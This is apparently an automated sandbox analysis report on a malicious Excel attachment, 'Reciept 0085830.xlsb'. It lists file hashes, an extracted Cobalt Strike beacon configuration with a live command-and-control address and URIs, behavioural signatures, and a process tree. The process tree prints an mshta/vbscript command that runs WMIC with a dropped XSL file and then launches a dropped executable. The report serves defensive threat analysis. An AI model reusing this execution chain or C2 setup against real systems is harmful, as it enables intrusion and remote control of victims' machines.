Analysis
-
max time kernel
1199s -
max time network
1222s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
06-07-2021 16:57
Static task
static1
Behavioral task
behavioral1
Sample
Reciept 0085830.xlsb
Resource
win7v20210410
General
-
Target
Reciept 0085830.xlsb
-
Size
66KB
-
MD5
c311de66dc44401313f4f68773b4c1dc
-
SHA1
3eacc0d27518ceddf2268ed968bb2e2374bd4253
-
SHA256
ef6d8a62c96a0fc27147b5d0116ec80c255634aa4d0379a96020afc6258731bf
-
SHA512
79c2ac6fb759bb89c4a70138a495f92b82efbd61c05fc9ef186807615647320612057482385dab99c492e62f8c437d68d49a5ed2136eb338acb88447e77fb96c
Malware Config
Extracted
cobaltstrike
1359593325
http://94.198.40.11:80/visit.js
-
access_type
512
-
host
94.198.40.11,/visit.js
-
http_header1
AAAABwAAAAAAAAADAAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
-
http_header2
AAAACgAAACZDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQAAAAcAAAAAAAAABQAAAAJpZAAAAAcAAAABAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
-
http_method1
GET
-
http_method2
POST
-
polling_time
60000
-
port_number
80
-
sc_process32
%windir%\syswow64\rundll32.exe
-
sc_process64
%windir%\sysnative\rundll32.exe
-
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCHFcV/jTWIWbMLGsg/xD3cCk0yHN+dWUBeSAZEdvXFEiawkFkWyJWyGyT0NbgSrwHmz+krYJY6l6YOoUNPWMNc6YpuQUYrBiilMX6rDkmmqUqem2tP6G4E6nBva8DOwNu671c8iFZeK4M8s6PPnUDuEuSHchHBLc5wV6Ew7BLO5QIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown1
4096
-
unknown2
AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
uri
/submit.php
-
user_agent
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
-
watermark
1359593325
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Processes:
resource yara_rule C:\Windows\Temp\68w43.exe cryptone -
Blocklisted process makes network request 1 IoCs
Processes:
WMIC.exeflow pid process 6 1888 WMIC.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
68w43.exepid process 1640 68w43.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
EXCEL.EXEmshta.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main mshta.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1728 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 41 IoCs
Processes:
WMIC.exeEXCEL.EXEdescription pid process Token: SeIncreaseQuotaPrivilege 1888 WMIC.exe Token: SeSecurityPrivilege 1888 WMIC.exe Token: SeTakeOwnershipPrivilege 1888 WMIC.exe Token: SeLoadDriverPrivilege 1888 WMIC.exe Token: SeSystemProfilePrivilege 1888 WMIC.exe Token: SeSystemtimePrivilege 1888 WMIC.exe Token: SeProfSingleProcessPrivilege 1888 WMIC.exe Token: SeIncBasePriorityPrivilege 1888 WMIC.exe Token: SeCreatePagefilePrivilege 1888 WMIC.exe Token: SeBackupPrivilege 1888 WMIC.exe Token: SeRestorePrivilege 1888 WMIC.exe Token: SeShutdownPrivilege 1888 WMIC.exe Token: SeDebugPrivilege 1888 WMIC.exe Token: SeSystemEnvironmentPrivilege 1888 WMIC.exe Token: SeRemoteShutdownPrivilege 1888 WMIC.exe Token: SeUndockPrivilege 1888 WMIC.exe Token: SeManageVolumePrivilege 1888 WMIC.exe Token: 33 1888 WMIC.exe Token: 34 1888 WMIC.exe Token: 35 1888 WMIC.exe Token: SeIncreaseQuotaPrivilege 1888 WMIC.exe Token: SeSecurityPrivilege 1888 WMIC.exe Token: SeTakeOwnershipPrivilege 1888 WMIC.exe Token: SeLoadDriverPrivilege 1888 WMIC.exe Token: SeSystemProfilePrivilege 1888 WMIC.exe Token: SeSystemtimePrivilege 1888 WMIC.exe Token: SeProfSingleProcessPrivilege 1888 WMIC.exe Token: SeIncBasePriorityPrivilege 1888 WMIC.exe Token: SeCreatePagefilePrivilege 1888 WMIC.exe Token: SeBackupPrivilege 1888 WMIC.exe Token: SeRestorePrivilege 1888 WMIC.exe Token: SeShutdownPrivilege 1888 WMIC.exe Token: SeDebugPrivilege 1888 WMIC.exe Token: SeSystemEnvironmentPrivilege 1888 WMIC.exe Token: SeRemoteShutdownPrivilege 1888 WMIC.exe Token: SeUndockPrivilege 1888 WMIC.exe Token: SeManageVolumePrivilege 1888 WMIC.exe Token: 33 1888 WMIC.exe Token: 34 1888 WMIC.exe Token: 35 1888 WMIC.exe Token: SeShutdownPrivilege 1728 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
EXCEL.EXEpid process 1728 EXCEL.EXE 1728 EXCEL.EXE 1728 EXCEL.EXE -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
taskeng.exemshta.EXEWMIC.exedescription pid process target process PID 1556 wrote to memory of 1664 1556 taskeng.exe mshta.EXE PID 1556 wrote to memory of 1664 1556 taskeng.exe mshta.EXE PID 1556 wrote to memory of 1664 1556 taskeng.exe mshta.EXE PID 1664 wrote to memory of 1888 1664 mshta.EXE WMIC.exe PID 1664 wrote to memory of 1888 1664 mshta.EXE WMIC.exe PID 1664 wrote to memory of 1888 1664 mshta.EXE WMIC.exe PID 1888 wrote to memory of 1640 1888 WMIC.exe 68w43.exe PID 1888 wrote to memory of 1640 1888 WMIC.exe 68w43.exe PID 1888 wrote to memory of 1640 1888 WMIC.exe 68w43.exe PID 1888 wrote to memory of 1640 1888 WMIC.exe 68w43.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Reciept 0085830.xlsb"1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskeng.exetaskeng.exe {50B946E6-C2A4-46B5-AEE7-7D2C1E97B544} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.EXEC:\Windows\system32\mshta.EXE vbscript:Execute("set osh = CreateObject(""Wscript.Shell""):osh.Run(""wmic os get /format:"" & Chr(34) & osh.ExpandEnvironmentStrings(""C:\ProgramData"") & ""\\qOLEDBQuery.xsl"" & Chr(34)),0:close")2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" os get /format:"C:\ProgramData\\qOLEDBQuery.xsl"3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Temp\68w43.exe"C:\Windows\Temp\68w43.exe"4⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\qOLEDBQuery.xslMD5
406f4c54f22f973d09c6b2af9e220622
SHA1f11ea0a6427f20028ebb1882adeae1d8359fbcd3
SHA256c8a27b11d7765c96f0e8c16df06d9fa8dd9485b6d588f552d71b8e9b703e0280
SHA5126825a2cdb52b6cdedd5d80e4eebb0f756a2f56704f514159b3637ccfa8ed3a1ed3db9f2fa75809f94d1c4ba4faddb941c8fcd13e87f59535b72363898b29c6de
-
C:\Windows\Temp\68w43.exeMD5
9a2e1bb9ad6f1ccfeaa4c2c55637ae3b
SHA1d42d55cab8637f847efdc1a01bcd5bb2d4668b7d
SHA256b012145b80d5176d73ed67924be9b1290d7920f05bf436f37deca4799b6d88b6
SHA512c8233171f957979936ea517dcabb3732e54b1cc19e89853d198b48c36f9609d2d8d0a0e75267a63162bd7d40371d22fbc62084441eaaec4d8670a5c2d985d1a6
-
memory/1640-69-0x0000000075971000-0x0000000075973000-memory.dmpFilesize
8KB
-
memory/1640-67-0x0000000000000000-mapping.dmp
-
memory/1640-70-0x0000000000220000-0x0000000000267000-memory.dmpFilesize
284KB
-
memory/1640-71-0x0000000000400000-0x0000000000453000-memory.dmpFilesize
332KB
-
memory/1640-72-0x00000000002A0000-0x00000000002D3000-memory.dmpFilesize
204KB
-
memory/1640-73-0x0000000000460000-0x000000000049D000-memory.dmpFilesize
244KB
-
memory/1664-63-0x0000000000000000-mapping.dmp
-
memory/1664-64-0x000007FEFBE41000-0x000007FEFBE43000-memory.dmpFilesize
8KB
-
memory/1728-62-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1728-61-0x00000000716F1000-0x00000000716F3000-memory.dmpFilesize
8KB
-
memory/1728-60-0x000000002F091000-0x000000002F094000-memory.dmpFilesize
12KB
-
memory/1888-65-0x0000000000000000-mapping.dmp